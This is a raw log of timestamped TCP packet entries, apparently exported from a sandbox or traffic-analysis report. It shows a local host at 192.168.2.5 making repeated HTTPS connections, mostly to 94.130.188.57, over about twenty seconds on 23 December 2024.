                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.259172916 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.475239038 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.475287914 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.475389957 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.475658894 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.475676060 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.902998924 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.903079987 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.903131962 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.903157949 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.904175997 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.904191017 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.469160080 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.469616890 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.469682932 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.471159935 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.471232891 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.471630096 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.471716881 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.484018087 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.484057903 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.484136105 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.484406948 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.484412909 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.524121046 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.524152994 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.570641041 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.876053095 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.876213074 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.876750946 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.876780033 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.878626108 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.878638983 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.878711939 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:56.878724098 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.884603977 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.884691954 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.885596037 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.885612965 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.888158083 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.888180971 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.888204098 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.888211966 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.895780087 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.895865917 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.895869017 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.895932913 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.900567055 CET50088443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:57.900595903 CET4435008894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.507240057 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.507286072 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.507395029 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.507817030 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.507832050 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.915008068 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.915093899 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.915160894 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.915199995 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.916106939 CET50089443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:58.916124105 CET4435008994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.518168926 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.518255949 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.518467903 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.518836975 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.518870115 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.908391953 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.908452034 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.909017086 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.909025908 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.912746906 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.912758112 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.913017035 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:59.913022995 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.918479919 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.918593884 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.919184923 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.919198990 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.921252966 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.921258926 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.921298027 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.921307087 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.949392080 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.949472904 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.949548960 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.949580908 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.950448990 CET50095443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:00.950469017 CET4435009594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.538074970 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.538136959 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.538320065 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.538525105 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.538535118 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.973136902 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.973309994 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.973320961 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.973382950 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.974817991 CET50098443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:01.974845886 CET4435009894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.581916094 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.581964016 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.582043886 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.582339048 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.582355022 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.940407038 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.940521002 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.941169024 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.941178083 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944389105 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944389105 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944396973 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944411039 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.981548071 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.981627941 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.981749058 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.982839108 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.982876062 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.989926100 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.990015030 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.990674973 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.990684032 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.992491961 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.992500067 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.992521048 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.992531061 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:04.624490023 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:04.624532938 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:04.624641895 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:04.624985933 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:04.625005007 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.024190903 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.024285078 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.024322987 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.024375916 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.024383068 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.024432898 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.025330067 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.025351048 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.625448942 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.625498056 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.625591040 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.625792980 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:05.625812054 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.028974056 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.029344082 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.029903889 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.029911995 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.032006979 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.032006979 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.032013893 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:06.032027960 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.030900955 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.031074047 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.031682968 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.031688929 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.033576012 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.033581972 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.033821106 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.033828020 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.072678089 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.072761059 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.072771072 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.072865009 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.072916031 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.073000908 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.074136019 CET50116443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.074151993 CET4435011694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.633888006 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.633938074 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.634016037 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.634905100 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:07.634922981 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.058813095 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.058998108 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.059012890 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.059083939 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.060055971 CET50118443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.060081005 CET4435011894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.652620077 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.652683973 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.652761936 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.653023005 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:08.653039932 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.036359072 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.036515951 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.037203074 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.037216902 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.039058924 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.039063931 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.039099932 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:09.039104939 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.045289993 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.045377016 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.045393944 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.045449972 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.046628952 CET50123443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.046653032 CET4435012394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.054424047 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.054508924 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.054953098 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.054964066 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.056759119 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.056763887 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.056801081 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.056804895 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.662705898 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.662791967 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.663007975 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.663254023 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:10.663284063 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.065382004 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.065567017 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.065581083 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.065649033 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.066719055 CET50129443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.066729069 CET4435012994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.677059889 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.677098989 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.677200079 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.677484989 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:11.677500963 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.068072081 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.068236113 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.068892002 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.068929911 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.071403027 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.071439028 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.071485996 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:12.071506977 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.077341080 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.077510118 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.078183889 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.078201056 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.079969883 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.079982996 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.080024004 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.080034018 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.088985920 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.089109898 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.089133978 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.089235067 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.089431047 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.089489937 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.090136051 CET50135443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.090153933 CET4435013594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.684878111 CET50142443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.684927940 CET4435014294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.685034037 CET50142443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.685345888 CET50142443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:13.685358047 CET4435014294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.093102932 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.093290091 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.093374014 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.093374014 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.094269991 CET50136443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.094295025 CET4435013694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.700824022 CET50145443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.700880051 CET4435014594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.700957060 CET50145443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.701261044 CET50145443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:14.701278925 CET4435014594.130.188.57192.168.2.5
